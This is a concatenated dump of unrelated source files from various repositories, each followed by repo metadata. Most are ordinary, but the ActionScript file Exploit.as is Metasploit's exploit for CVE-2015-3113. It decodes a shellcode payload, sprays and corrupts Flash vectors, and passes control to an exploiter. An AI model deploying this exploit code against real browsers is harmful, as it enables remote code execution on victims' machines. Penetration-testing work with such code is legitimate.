try pid |> Sys_utils.handle_of_pid_for_termination |> Sys_utils.terminate_process with
| Unix.Unix_error (Unix.ESRCH, "kill", _) ->
(* no such process *)
())
pids;
ignore (Unix.sleep 1);
if CommandConnectSimple.server_exists ~flowconfig_name ~tmp_dir root then raise (FailedToKill None);
()
| OCaml | 4 | zhangmaijun/flow | src/commands/commandMeanKill.ml | [
"MIT"
] |
include "stdio.sl";
include "stdlib.sl";
var setclkdiv = asm {
.def SERIALREG0 136
.def SERIALREG1 137
.def SERIALREG3 139
pop x
ld r0, x # r0 = clkdiv
# select divisor latches:
# write 0x80 to line control register
ld x, 0x80
out SERIALREG3, x
# set high byte of divisor latch = 0
ld x, 0
out SERIALREG1, x
# set low byte of divisor latch = SERIALCLKDIV
ld x, r0
out SERIALREG0, x
# select data register instead of divisor latches, and set 8-bit words, no parity, 1 stop:
# write 0x03 to line control register (addr 3)
ld x, 0x03
out SERIALREG3, x
ret
};
var args = cmdargs()+1;
if (!*args) {
fprintf(2, "usage: baud N\nexample: baud 9600\n", 0);
exit(1);
};
var baud_rate = atoi(*args);
# XXX: should be 115200/baud_rate but 115200 is too large for 16-bit
var clkdiv = div(57600, baud_rate);
clkdiv = clkdiv + clkdiv;
setclkdiv(clkdiv);
| Slash | 4 | jes/scamp-cpu | sys/baud.sl | [
"Unlicense"
] |
/*##############################################################################
HPCC SYSTEMS software Copyright (C) 2012 HPCC Systems®.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
############################################################################## */
// this test errors
aa := dataset('aaa',{INTEGER a1; }, FLAT);
record1 := record
integer i1;
integer i2;
end;
record2 := record
record1 r1;
record1 r2;
end;
record3 := record
integer i1;
integer i2;
record1 r1;
record1 r2;
end;
record1 tranx0(integer i, integer j) := transform
self.i1 := i;
self.i2 := j;
end;
// should OK
record2 tranx1(record1 L, integer i) := transform
self.r1.i1 := 1;
self.r1.i2 := 2;
self.r2.i1 := 3;
self.r2.i2 := i;
end;
// should OK
record2 tranx2(record1 L, integer i) := transform
self.r1 := L;
self.r2 := L;
end;
// should OK
record3 tranx3(record1 L, integer i) := transform
self := L;
self.r1 := L;
self.r2.i1 := 1;
self.r2.i2 := 2;
end;
record3 tranx4(record1 L, integer i) := transform
self := L;
self.r1 := L;
self.r2.i1 := 1;
self.r2.i2 := i;
end;
record3 tranx5(integer i, integer j) := transform
self.i1 := i;
self.i2 := j;
self.r1.i1 := i;
self.r1.i2 := j;
self.r2.i1 := i;
self.r2.i2 := j;
end;
mytable := dataset([{1,2},{3,4}], record1);
normalizedStuff := normalize(mytable, LEFT.i1, tranx4(LEFT, COUNTER));
output(normalizedStuff);
| ECL | 4 | miguelvazq/HPCC-Platform | ecl/regress/checkassigned2.ecl | [
"Apache-2.0"
] |
#pragma TextEncoding="UTF-8"
#pragma rtGlobals=3
#pragma ModuleName=SIDAMLoadData
#include "SIDAM_Display"
#include "SIDAM_Utilities_Control"
#include "SIDAM_Utilities_Panel"
#ifndef SIDAMshowProc
#pragma hide = 1
#endif
//@
// Load data files.
//
// ## Parameters
// pathStr : string
// Path to a file or a directory. When a path to a directory is given,
// files under the directory are loaded recursively.
// history : int {0 or !0}
// Set !0 to print this command in the history.
//
// ## Returns
// wave
// Loaded wave.
//@
Function/WAVE SIDAMLoadData(String pathStr, [int history])
history = ParamIsDefault(history) ? 0 : history
int isFolder
if(validatePath(pathStr, isFolder))
return $""
endif
// If pathStr is a folder, load all the files in the folder and subfolders
if (isFolder)
int i, n
String pathName = UniqueName("path", 12, 0)
NewPath/Q/Z $pathName, pathStr
// If a folder(s) is included in pathStr, call this function
// for the folder(s)
n = ItemsInList(IndexedDir($pathName, -1, 0))
for (i = 0; i < n; i += 1)
SIDAMLoadData(IndexedDir($pathName, i, 1)) // no history
endfor
// If a file(s) is included in pathStr, call this function
// for the file(s)
n = ItemsInList(IndexedFile($pathName, -1, "????"))
for (i = 0; i < n; i++)
SIDAMLoadData(ParseFilePath(2, pathStr, ":", 0, 0) \
+ IndexedFile($pathName, i, "????")) // no history
endfor
KillPath $pathName
if (history)
printHistory(pathStr)
endif
return $""
endif
return loadDataFile(pathStr,history)
End
Static Function validatePath(String &pathStr, int &isFolder)
String errMsg = PRESTR_CAUTION + "SIDAMLoadData gave error: "
if (strlen(pathStr))
GetFileFolderInfo/Q/Z pathStr
if (V_Flag)
printf "%sfile or folder not found.\r", errMsg
return V_Flag
endif
if (V_isAliasShortcut)
pathStr = S_aliasPath // Use path to the actual file
endif
if (V_isFolder)
isFolder = 1
endif
return V_Flag
endif
// called from the menu
GetLastUserMenuInfo
isFolder = V_value == 2
if (isFolder)
GetFileFolderInfo/D/Q/Z=2 // display a dialog to select a folder
else
GetFileFolderInfo/Q/Z=2 // display a dialog to select a file
endif
if (V_Flag == -1) // user cancel
return V_Flag
elseif (V_Flag)
printf "%sfile or folder not found.\r", errMsg
endif
pathStr = S_path
return V_Flag
End
Static Function/WAVE loadDataFile(String pathStr, int history)
String fileName = ParseFilePath(0, pathStr, ":", 1, 0) // file name
String fileNameNoExt = ParseFilePath(3, pathStr, ":", 0, 0) // file name without extension
String extStr = LowerStr(ParseFilePath(4, pathStr, ":", 0, 0)) // extension
int i, n
// Fetch function names from functions.ini (or functions.default.ini).
String fnName = fetchFunctionName(extStr)
if (!strlen(fnName)) // function is not found
if (strsearch(GetRTStackInfo(3),"SIDAMFileOpenHook",0) >= 0) // called by drag && drop
AbortOnValue 1, 1
else
printf "%sNo file loader is found for %s\r", PRESTR_CAUTION, pathStr
return $""
endif
endif
// Load a data file with the obtained function(s)
for (i = 0, n = ItemsInList(fnName, ","); i < n; i += 1)
DFREF dfrSav = GetDataFolderDFR()
DFREF dfrNew = createNewDFandMove(fileNameNoExt)
if (!DataFolderRefStatus(dfrNew))
return $""
endif
FUNCREF SIDAMLoadDataPrototype fn = $StringFromList(i, fnName, ",")
try
Wave/Z w = fn(pathStr)
catch
SetDataFolder dfrSav
KillDataFolder dfrNew
AbortOnValue 1, 1
endtry
SetDataFolder dfrSav
if (!WaveExists(w))
KillDataFolder dfrNew
return $""
endif
if (history)
printHistory(pathStr)
endif
int isCtrlPressed = GetKeyState(1)&1
if (isCtrlPressed)
SIDAMDisplay(w, history=1)
endif
return w
endfor
End
Static Function/S fetchFunctionName(String extStr)
int i
String item, key
for (i = 0; i < ItemsInList(SIDAM_LOADER_FUNCTIONS); i++)
item = StringFromList(i, SIDAM_LOADER_FUNCTIONS)
key = StringFromList(0, item, ":")
if (WhichListItem(extStr, key, ",") != -1)
return StringFromList(1, item, ":")
endif
endfor
return ""
End
Static Function printHistory(String pathStr)
printf "%sSIDAMLoadData(\"%s\")\r", PRESTR_CMD, ReplaceString("\\",pathStr,"\\\\")
End
// Prototype of data loading functions
Function/WAVE SIDAMLoadDataPrototype(String pathStr)
Abort
End
//-----------------------------------------------------------------------------------------------
// Creates a new data folder where data files will be loaded and return the data folder reference
//-----------------------------------------------------------------------------------------------
Static Function/DF createNewDFandMove(String fileName)
// If root:$filename already exists, show a panel to receive a new name
int dfExist = DataFolderExists("root:"+PossiblyQuoteName(filename))
// Do not use String newName = SelectString(dfExist, filename, pnl(filename))
// because pnl(filename) is called even when dfExist is 0.
String newName
if (dfExist)
newName = pnl(filename)
else
newName = filename
endif
// When the cancel button in the panel was clicked
if (!strlen(newName))
return $""
endif
NewDataFolder/S root:$newName
return GetDataFolderDFR()
End
// Show a panel to receive a name of a new data folder
Static Function/S pnl(String fileName)
// Prepare a global string to receive a new name from the panel
String strName = UniqueName("newname", 4, 0)
String/G $strName
String pnlName = SIDAMNewPanel("Load Data...", 335, 105)
SetWindow $pnlName userData(strName)=strName
SetDrawLayer ProgBack
DrawText 8,20,"The following name is already used as a datafolder."
DrawText 8,37,"Enter a new name to make another datafolder."
SetVariable nameV title="", pos={8,46}, size={320,16}, bodyWidth=320, focusRing=0, win=$pnlName
SetVariable nameV value= _STR:fileName, proc=SIDAMLoadData#pnlSetVar, win=$pnlName
Button doB title="Do It", pos={7,77}, disable=2, win=$pnlName
Button cancelB title="Cancel", pos={259,77}, win=$pnlName
ModifyControlList "doB;cancelB" size={70,22}, proc=SIDAMLoadData#pnlButton, focusRing=0, win=$pnlName
SIDAMValidateSetVariableString(pnlName, "nameV", 0, maxlength=0) // maxlength=0 is to make the background red
do
PauseForUser/C $pnlName
while (V_Flag)
// Get a name saved in the global string
SVAR name = $strName
String rtnStr = name
KillStrings $strName
return rtnStr
End
// Controls
Static Function pnlSetVar(STRUCT WMSetVariableAction &s)
// Handle either enter key or end edit
if (s.eventCode != 2 && s.eventCode != 8)
return 1
endif
int exceedLength = SIDAMValidateSetVariableString(s.win, s.ctrlName, 0, minlength=1, maxlength=MAX_OBJ_NAME)
int alreadyExist = DataFolderExists("root:"+PossiblyQuoteName(s.sval))
if (exceedLength || alreadyExist)
Button/Z doB disable=2, win=$s.win
// The background does not become red somehow. Igor's bug?
SIDAMValidateSetVariableString(s.win, "nameV", 0, maxlength=0) // maxlength=0 is to make the background red
else
Button/Z doB disable=0, win=$s.win
endif
End
Static Function pnlButton(STRUCT WMButtonAction &s)
if (s.eventCode != 2)
return 0
endif
SVAR name = $GetUserData(s.win,"","strName")
strswitch (s.ctrlName)
case "doB":
ControlInfo/W=$s.win nameV
name = S_Value
break
case "cancelB":
name = ""
break
endswitch
KillWindow $s.win
End
| IGOR Pro | 5 | yuksk/SIDAM | src/SIDAM/func/SIDAM_LoadData.ipf | [
"MIT"
] |
#!/usr/bin/env bash
# This file is accessible as https://install.direct/go.sh
# Original source is located at github.com/v2fly/v2ray-core/release/install-release.sh
# If not specify, default meaning of return value:
# 0: Success
# 1: System error
# 2: Application error
# 3: Network error
#######color code########
RED="31m" # Error message
YELLOW="33m" # Warning message
colorEcho(){
echo -e "\033[${1}${@:2}\033[0m" 1>& 2
}
colorEcho ${RED} "ERROR: This script has been DISCARDED, please switch to fhs-install-v2ray project."
colorEcho ${YELLOW} "HOW TO USE: https://github.com/v2fly/fhs-install-v2ray"
colorEcho ${YELLOW} "TO MIGRATE: https://github.com/v2fly/fhs-install-v2ray/wiki/Migrate-from-the-old-script-to-this"
exit 255
| Shell | 4 | demianrey/v2ray-core-SagerNet- | release/install-release.sh | [
"MIT"
] |
<h1>Hello!</h1>
<div>{% renderbody %}</div> | Liquid | 1 | ScriptBox99/FluentEmail | test/FluentEmail.Liquid.Tests/EmailTemplates/_layout.liquid | [
"MIT"
] |
/*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*--------------------------------------------------------------------------------------------*/
import 'vs/css!./simpleFindWidget';
import * as nls from 'vs/nls';
import * as dom from 'vs/base/browser/dom';
import { FindInput, IFindInputStyles } from 'vs/base/browser/ui/findinput/findInput';
import { Widget } from 'vs/base/browser/ui/widget';
import { Delayer } from 'vs/base/common/async';
import { KeyCode } from 'vs/base/common/keyCodes';
import { FindReplaceState } from 'vs/editor/contrib/find/findState';
import { IMessage as InputBoxMessage } from 'vs/base/browser/ui/inputbox/inputBox';
import { SimpleButton, findPreviousMatchIcon, findNextMatchIcon } from 'vs/editor/contrib/find/findWidget';
import { IContextKeyService } from 'vs/platform/contextkey/common/contextkey';
import { IContextViewService } from 'vs/platform/contextview/browser/contextView';
import { editorWidgetBackground, inputActiveOptionBorder, inputActiveOptionBackground, inputActiveOptionForeground, inputBackground, inputBorder, inputForeground, inputValidationErrorBackground, inputValidationErrorBorder, inputValidationErrorForeground, inputValidationInfoBackground, inputValidationInfoBorder, inputValidationInfoForeground, inputValidationWarningBackground, inputValidationWarningBorder, inputValidationWarningForeground, widgetShadow, editorWidgetForeground } from 'vs/platform/theme/common/colorRegistry';
import { IColorTheme, registerThemingParticipant } from 'vs/platform/theme/common/themeService';
import { ContextScopedFindInput } from 'vs/platform/browser/contextScopedHistoryWidget';
import { widgetClose } from 'vs/platform/theme/common/iconRegistry';
const NLS_FIND_INPUT_LABEL = nls.localize('label.find', "Find");
const NLS_FIND_INPUT_PLACEHOLDER = nls.localize('placeholder.find', "Find");
const NLS_PREVIOUS_MATCH_BTN_LABEL = nls.localize('label.previousMatchButton', "Previous Match");
const NLS_NEXT_MATCH_BTN_LABEL = nls.localize('label.nextMatchButton', "Next Match");
const NLS_CLOSE_BTN_LABEL = nls.localize('label.closeButton', "Close");
export abstract class SimpleFindWidget extends Widget {
private readonly _findInput: FindInput;
private readonly _domNode: HTMLElement;
private readonly _innerDomNode: HTMLElement;
private readonly _focusTracker: dom.IFocusTracker;
private readonly _findInputFocusTracker: dom.IFocusTracker;
private readonly _updateHistoryDelayer: Delayer<void>;
private readonly prevBtn: SimpleButton;
private readonly nextBtn: SimpleButton;
private _isVisible: boolean = false;
private foundMatch: boolean = false;
constructor(
@IContextViewService private readonly _contextViewService: IContextViewService,
@IContextKeyService contextKeyService: IContextKeyService,
private readonly _state: FindReplaceState = new FindReplaceState(),
showOptionButtons?: boolean,
checkImeCompletionState?: boolean
) {
super();
this._findInput = this._register(new ContextScopedFindInput(null, this._contextViewService, {
label: NLS_FIND_INPUT_LABEL,
placeholder: NLS_FIND_INPUT_PLACEHOLDER,
validation: (value: string): InputBoxMessage | null => {
if (value.length === 0 || !this._findInput.getRegex()) {
return null;
}
try {
new RegExp(value);
return null;
} catch (e) {
this.foundMatch = false;
this.updateButtons(this.foundMatch);
return { content: e.message };
}
}
}, contextKeyService, showOptionButtons));
// Find History with update delayer
this._updateHistoryDelayer = new Delayer<void>(500);
this._register(this._findInput.onInput((e) => {
if (!checkImeCompletionState || !this._findInput.isImeSessionInProgress) {
this.foundMatch = this._onInputChanged();
this.updateButtons(this.foundMatch);
this.focusFindBox();
this._delayedUpdateHistory();
}
}));
this._findInput.setRegex(!!this._state.isRegex);
this._findInput.setCaseSensitive(!!this._state.matchCase);
this._findInput.setWholeWords(!!this._state.wholeWord);
this._register(this._findInput.onDidOptionChange(() => {
this._state.change({
isRegex: this._findInput.getRegex(),
wholeWord: this._findInput.getWholeWords(),
matchCase: this._findInput.getCaseSensitive()
}, true);
}));
this._register(this._state.onFindReplaceStateChange(() => {
this._findInput.setRegex(this._state.isRegex);
this._findInput.setWholeWords(this._state.wholeWord);
this._findInput.setCaseSensitive(this._state.matchCase);
this.findFirst();
}));
this.prevBtn = this._register(new SimpleButton({
label: NLS_PREVIOUS_MATCH_BTN_LABEL,
icon: findPreviousMatchIcon,
onTrigger: () => {
this.find(true);
}
}));
this.nextBtn = this._register(new SimpleButton({
label: NLS_NEXT_MATCH_BTN_LABEL,
icon: findNextMatchIcon,
onTrigger: () => {
this.find(false);
}
}));
const closeBtn = this._register(new SimpleButton({
label: NLS_CLOSE_BTN_LABEL,
icon: widgetClose,
onTrigger: () => {
this.hide();
}
}));
this._innerDomNode = document.createElement('div');
this._innerDomNode.classList.add('simple-find-part');
this._innerDomNode.appendChild(this._findInput.domNode);
this._innerDomNode.appendChild(this.prevBtn.domNode);
this._innerDomNode.appendChild(this.nextBtn.domNode);
this._innerDomNode.appendChild(closeBtn.domNode);
// _domNode wraps _innerDomNode, ensuring that
this._domNode = document.createElement('div');
this._domNode.classList.add('simple-find-part-wrapper');
this._domNode.appendChild(this._innerDomNode);
this.onkeyup(this._innerDomNode, e => {
if (e.equals(KeyCode.Escape)) {
this.hide();
e.preventDefault();
return;
}
});
this._focusTracker = this._register(dom.trackFocus(this._innerDomNode));
this._register(this._focusTracker.onDidFocus(this._onFocusTrackerFocus.bind(this)));
this._register(this._focusTracker.onDidBlur(this._onFocusTrackerBlur.bind(this)));
this._findInputFocusTracker = this._register(dom.trackFocus(this._findInput.domNode));
this._register(this._findInputFocusTracker.onDidFocus(this._onFindInputFocusTrackerFocus.bind(this)));
this._register(this._findInputFocusTracker.onDidBlur(this._onFindInputFocusTrackerBlur.bind(this)));
this._register(dom.addDisposableListener(this._innerDomNode, 'click', (event) => {
event.stopPropagation();
}));
}
protected abstract _onInputChanged(): boolean;
protected abstract find(previous: boolean): void;
protected abstract findFirst(): void;
protected abstract _onFocusTrackerFocus(): void;
protected abstract _onFocusTrackerBlur(): void;
protected abstract _onFindInputFocusTrackerFocus(): void;
protected abstract _onFindInputFocusTrackerBlur(): void;
protected get inputValue() {
return this._findInput.getValue();
}
public get focusTracker(): dom.IFocusTracker {
return this._focusTracker;
}
public updateTheme(theme: IColorTheme): void {
const inputStyles: IFindInputStyles = {
inputActiveOptionBorder: theme.getColor(inputActiveOptionBorder),
inputActiveOptionForeground: theme.getColor(inputActiveOptionForeground),
inputActiveOptionBackground: theme.getColor(inputActiveOptionBackground),
inputBackground: theme.getColor(inputBackground),
inputForeground: theme.getColor(inputForeground),
inputBorder: theme.getColor(inputBorder),
inputValidationInfoBackground: theme.getColor(inputValidationInfoBackground),
inputValidationInfoForeground: theme.getColor(inputValidationInfoForeground),
inputValidationInfoBorder: theme.getColor(inputValidationInfoBorder),
inputValidationWarningBackground: theme.getColor(inputValidationWarningBackground),
inputValidationWarningForeground: theme.getColor(inputValidationWarningForeground),
inputValidationWarningBorder: theme.getColor(inputValidationWarningBorder),
inputValidationErrorBackground: theme.getColor(inputValidationErrorBackground),
inputValidationErrorForeground: theme.getColor(inputValidationErrorForeground),
inputValidationErrorBorder: theme.getColor(inputValidationErrorBorder)
};
this._findInput.style(inputStyles);
}
override dispose() {
super.dispose();
if (this._domNode && this._domNode.parentElement) {
this._domNode.parentElement.removeChild(this._domNode);
}
}
public getDomNode() {
return this._domNode;
}
public reveal(initialInput?: string): void {
if (initialInput) {
this._findInput.setValue(initialInput);
}
if (this._isVisible) {
this._findInput.select();
return;
}
this._isVisible = true;
this.updateButtons(this.foundMatch);
setTimeout(() => {
this._innerDomNode.classList.add('visible', 'visible-transition');
this._innerDomNode.setAttribute('aria-hidden', 'false');
this._findInput.select();
}, 0);
}
public show(initialInput?: string): void {
if (initialInput && !this._isVisible) {
this._findInput.setValue(initialInput);
}
this._isVisible = true;
setTimeout(() => {
this._innerDomNode.classList.add('visible', 'visible-transition');
this._innerDomNode.setAttribute('aria-hidden', 'false');
}, 0);
}
public hide(): void {
if (this._isVisible) {
this._innerDomNode.classList.remove('visible-transition');
this._innerDomNode.setAttribute('aria-hidden', 'true');
// Need to delay toggling visibility until after Transition, then visibility hidden - removes from tabIndex list
setTimeout(() => {
this._isVisible = false;
this.updateButtons(this.foundMatch);
this._innerDomNode.classList.remove('visible');
}, 200);
}
}
protected _delayedUpdateHistory() {
this._updateHistoryDelayer.trigger(this._updateHistory.bind(this));
}
protected _updateHistory() {
this._findInput.inputBox.addToHistory();
}
protected _getRegexValue(): boolean {
return this._findInput.getRegex();
}
protected _getWholeWordValue(): boolean {
return this._findInput.getWholeWords();
}
protected _getCaseSensitiveValue(): boolean {
return this._findInput.getCaseSensitive();
}
protected updateButtons(foundMatch: boolean) {
const hasInput = this.inputValue.length > 0;
this.prevBtn.setEnabled(this._isVisible && hasInput && foundMatch);
this.nextBtn.setEnabled(this._isVisible && hasInput && foundMatch);
}
protected focusFindBox() {
// Focus back onto the find box, which
// requires focusing onto the next button first
this.nextBtn.focus();
this._findInput.inputBox.focus();
}
}
// theming
registerThemingParticipant((theme, collector) => {
const findWidgetBGColor = theme.getColor(editorWidgetBackground);
if (findWidgetBGColor) {
collector.addRule(`.monaco-workbench .simple-find-part { background-color: ${findWidgetBGColor} !important; }`);
}
const widgetForeground = theme.getColor(editorWidgetForeground);
if (widgetForeground) {
collector.addRule(`.monaco-workbench .simple-find-part { color: ${widgetForeground}; }`);
}
const widgetShadowColor = theme.getColor(widgetShadow);
if (widgetShadowColor) {
collector.addRule(`.monaco-workbench .simple-find-part { box-shadow: 0 0 8px 2px ${widgetShadowColor}; }`);
}
});
| TypeScript | 5 | kklt2002/vscode | src/vs/workbench/contrib/codeEditor/browser/find/simpleFindWidget.ts | [
"MIT"
] |
=pod
=head1 NAME
ossl_DER_w_begin_sequence, ossl_DER_w_end_sequence
- internal DER writers for DER constructed elements
=head1 SYNOPSIS
#include "internal/der.h"
int ossl_DER_w_begin_sequence(WPACKET *pkt, int tag);
int ossl_DER_w_end_sequence(WPACKET *pkt, int tag);
=head1 DESCRIPTION
All functions described here are wrappers for constructed structures,
i.e. the ASN.1 SEQUENCE, SET and CHOICE specifications. They all come
in pairs, as noted by the function names containing the words C<begin>
and B<end>.
When using these, special care must be taken to ensure that the ASN.1 tag
value I<tag> is the same in the matching C<begin> and C<end> function calls.
ossl_DER_w_begin_sequence() and ossl_DER_w_end_sequence() begins and ends a
SEQUENCE.
=head1 RETURN VALUES
All the functions return 1 on success and 0 on failure. Failure may
mean that the buffer held by the I<pkt> is too small, but may also
mean that the values given to the functions are invalid, such as the provided
I<tag> value being too large for the implementation.
=head1 SEE ALSO
L<DERlib(7)>
=head1 COPYRIGHT
Copyright 2020 The OpenSSL Project Authors. All Rights Reserved.
Licensed under the Apache License 2.0 (the "License"). You may not use
this file except in compliance with the License. You can obtain a copy
in the file LICENSE in the source distribution or at
L<https://www.openssl.org/source/license.html>.
=cut
| Pod | 4 | pmesnier/openssl | doc/internal/man3/ossl_DER_w_begin_sequence.pod | [
"Apache-2.0"
] |
%%%
%%% Authors:
%%% Michael Mehl (mehl@dfki.de)
%%%
%%% Copyright:
%%% Michael Mehl, 1998
%%%
%%% Last change:
%%% $Date$ by $Author$
%%% $Revision$
%%%
%%% This file is part of Mozart, an implementation
%%% of Oz 3
%%% http://www.mozart-oz.org
%%%
%%% See the file "LICENSE" or
%%% http://www.mozart-oz.org/LICENSE.html
%%% for information on usage and redistribution
%%% of this file, and for a DISCLAIMER OF ALL
%%% WARRANTIES.
%%%
functor
import
Space
export
Return
define
Return = fd([
simple(proc {$}
X Y S in
X::1#100000 Y::1#100000
S={Space.new
proc {$ _}
X<:Y Y<:X
end}
{Wait {Space.ask S}}
end
keys:[bench fd propagator]
bench:1)
])
end
| Oz | 4 | Ahzed11/mozart2 | platform-test/bench/fd.oz | [
"BSD-2-Clause"
] |
#import <UIKit/UIKit.h>
#import <BulletinBoard/BBSectionInfo.h>
#import <UIKit/UIImage+Private.h>
#import <version.h>
static NSString *const kHBDPWeeAppIdentifier = @"ws.hbang.dailypaperweeapp";
#pragma mark - Change section header and icon
// courtesy of benno
BOOL isDailyPaper = NO;
%hook SBBulletinObserverViewController
- (void)_addSection:(BBSectionInfo *)section toCategory:(NSInteger)category widget:(id)widget {
if ([section.sectionID isEqualToString:kHBDPWeeAppIdentifier]) {
isDailyPaper = YES;
%orig;
isDailyPaper = NO;
} else {
%orig;
}
}
%end
%hook SBBulletinListSection
- (void)setDisplayName:(NSString *)displayName {
%orig(isDailyPaper ? @"Current Wallpaper" : displayName);
}
- (void)setIconImage:(UIImage *)iconImage {
%orig(isDailyPaper ? [UIImage imageNamed:@"icon" inBundle:[NSBundle bundleWithPath:@"/Library/PreferenceBundles/DailyPaper.bundle"]] : iconImage);
}
%end
#pragma mark - Enable by default
%hook SBNotificationCenterDataProviderController
- (NSArray *)_copyDefaultEnabledWidgetIDs {
NSArray *defaultWidgets = %orig;
return [[defaultWidgets arrayByAddingObject:kHBDPWeeAppIdentifier] copy];
}
%end
#pragma mark - Constructor
%ctor {
if (!IS_IOS_OR_NEWER(iOS_8_0)) {
%init;
}
}
| Logos | 4 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Logos/NCHax.x | [
"MIT"
] |
# ${StrContains} OUT STRING SUBSTRING
# A method which searches a target string for a substring (case insensitive),
# setting OUT to 1 if found, 0 otherwise.
Var strContains_string
Var strContains_substring
Var strContains_stringLen
Var strContains_substringLen
Var strContains_loopStartOffset
Var strContains_loopLastOffset
Var strContains_loopSubstring
Var strContains_returnValue
Function StrContains
Pop $strContains_substring
Pop $strContains_string
StrCpy $strContains_returnValue 0
StrLen $strContains_stringLen $strContains_string
StrLen $strContains_substringLen $strContains_substring
StrCpy $strContains_loopStartOffset 0
IntOp $strContains_loopLastOffset $strContains_stringLen - $strContains_substringLen
# If we're searching for "ing" in "string", we search for "ing" against
# "str", "tri", "rin", and finally "ing"
loop:
IntCmp $strContains_loopStartOffset $strContains_loopLastOffset 0 0 done
StrCpy $strContains_loopSubstring $strContains_string $strContains_substringLen $strContains_loopStartOffset
StrCmp $strContains_loopSubstring $strContains_substring found
IntOp $strContains_loopStartOffset $strContains_loopStartOffset + 1
Goto loop
found:
StrCpy $strContains_returnValue 1
done:
Push $strContains_returnValue
FunctionEnd
!macro StrContains OUT STRING SUBSTRING
Push `${STRING}`
Push `${SUBSTRING}`
Call StrContains
Pop `${OUT}`
!macroend
!define StrContains '!insertmacro StrContains'
Var strContainsAnyOf_string
Var strContainsAnyOf_chars
Var strContainsAnyOf_charsLen
Var strContainsAnyOf_loopStartOffset
Var strContainsAnyOf_loopLastOffset
Var strContainsAnyOf_loopSubstring
Var strContainsAnyOf_returnValue
Function StrContainsAnyOf
Pop $strContainsAnyOf_chars
Pop $strContainsAnyOf_string
StrCpy $strContainsAnyOf_returnValue 0
StrLen $strContainsAnyOf_charsLen $strContainsAnyOf_chars
StrCpy $strContainsAnyOf_loopStartOffset 0
IntOp $strContainsAnyOf_loopLastOffset $strContainsAnyOf_charsLen - 1
loop:
IntCmp $strContainsAnyOf_loopStartOffset $strContainsAnyOf_loopLastOffset 0 0 done
StrCpy $strContainsAnyOf_loopSubstring $strContainsAnyOf_chars 1 $strContainsAnyOf_loopStartOffset
${StrContains} $strContainsAnyOf_returnValue $strContainsAnyOf_string $strContainsAnyOf_loopSubstring
${If} $strContainsAnyOf_returnValue = 1
Goto done
${EndIf}
IntOp $strContainsAnyOf_loopStartOffset $strContainsAnyOf_loopStartOffset + 1
Goto loop
done:
Push $strContainsAnyOf_returnValue
FunctionEnd
!macro StrContainsAnyOf OUT STRING CHARS
Push `${STRING}`
Push `${CHARS}`
Call StrContainsAnyOf
Pop `${OUT}`
!macroend
!define StrContainsAnyOf '!insertmacro StrContainsAnyOf'
| NSIS | 5 | phpc0de/idea-android | native/installer/win/StrContains.nsh | [
"Apache-2.0"
] |
package
{
import flash.display.Sprite
import flash.events.Event
import flash.events.NetStatusEvent
import flash.events.AsyncErrorEvent
import flash.media.Video
import flash.net.NetConnection
import flash.net.NetStream
import flash.utils.getTimer
import flash.utils.ByteArray
import mx.utils.Base64Decoder
import flash.display.LoaderInfo
public class Exploit extends Sprite
{
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
private var os:String
private var exploiter:Exploiter
public var bytes:Class;
public var video:Video = new Video(640, 480);
public var vecVectors:Vector.<Object>;
public function Exploit():void {
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
os = LoaderInfo(this.root.loaderInfo).parameters.os
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray()
addChild(video)
var nc:NetConnection = new NetConnection()
nc.addEventListener(NetStatusEvent.NET_STATUS , onConnect)
nc.addEventListener(AsyncErrorEvent.ASYNC_ERROR , trace)
var metaSniffer:Object=new Object()
metaSniffer.onMetaData=getMeta
nc.connect(null)
var ns:NetStream = new NetStream(nc)
ns.client = metaSniffer
video.attachNetStream(ns)
vecVectors = new Vector.<Object>(0x1000)
for ( var i:uint = 0; i < vecVectors.length; ++ i ) {
vecVectors[i] = new Vector.<uint>((0x2000 - 8) / 4);
vecVectors[i][0] = 0xdeedbeef;
}
for ( i = 0; i < vecVectors.length; i += 2 ) {
vecVectors[i] = null;
}
ns.addEventListener(NetStatusEvent.NET_STATUS, statusChanged)
ns.play("poc2.flv")
}
private function go():void {
var bigVector:Vector.<uint> = null;
for ( var i:uint = 0; i < vecVectors.length; i++ ) {
if (vecVectors[i] == null) continue
if ( vecVectors[i].length > (0x2000 - 8) / 4 ) {
bigVector = vecVectors[i] as Vector.<uint>
}
}
if ( null == bigVector ) {
return;
}
for ( i = 0; i < 0x2000; i++ ) {
if (bigVector[i] == 0x7fe && bigVector[i + 2] == 0xdeedbeef) {
bigVector[0x3fffffff] = bigVector[i + 1]
break
}
}
for ( i = 0; i < vecVectors.length; i++ ) {
if (vecVectors[i] == null) continue
if (vecVectors[i].length != 0x7fe) {
delete(vecVectors[i])
vecVectors[i] = null
}
}
exploiter = new Exploiter(this, platform, os, payload, bigVector, 0x7fe)
}
private function statusChanged(stats:NetStatusEvent):void {
if (stats.info.code == 'NetStream.Play.Stop') {
WaitTimer(1000)
go()
}
}
private function getMeta (mdata:Object):void {
video.width=mdata.width/2
video.height=mdata.height/2
}
private function onConnect(e:NetStatusEvent):void {
return
}
private function WaitTimer(time:int):void{
var current:int = getTimer()
while (true) {
if ((getTimer() - current) >= time) break
}
}
}
}
| ActionScript | 0 | OsmanDere/metasploit-framework | external/source/exploits/CVE-2015-3113/Exploit.as | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
"""Tests for the Meater integration."""
| Python | 0 | mtarjoianu/core | tests/components/meater/__init__.py | [
"Apache-2.0"
] |
import structs/[MultiMap, List]
fails := false
main: func {
stringString()
if (fails) {
"We've had failures" println()
exit(1)
}
"Pass" println()
}
stringString: func {
map := MultiMap<String, String> new()
map put("a", "one")
ensure(map size, 1, "map size")
ensure(map getKeys() size, 1, "map keys size")
ensure(map get("a"), "one")
map put("a", "two")
ensure(map size, 1, "map size")
ensure(map getKeys() size, 1, "map keys size")
ensure(map get("a"), "two")
res := map getAll("a")
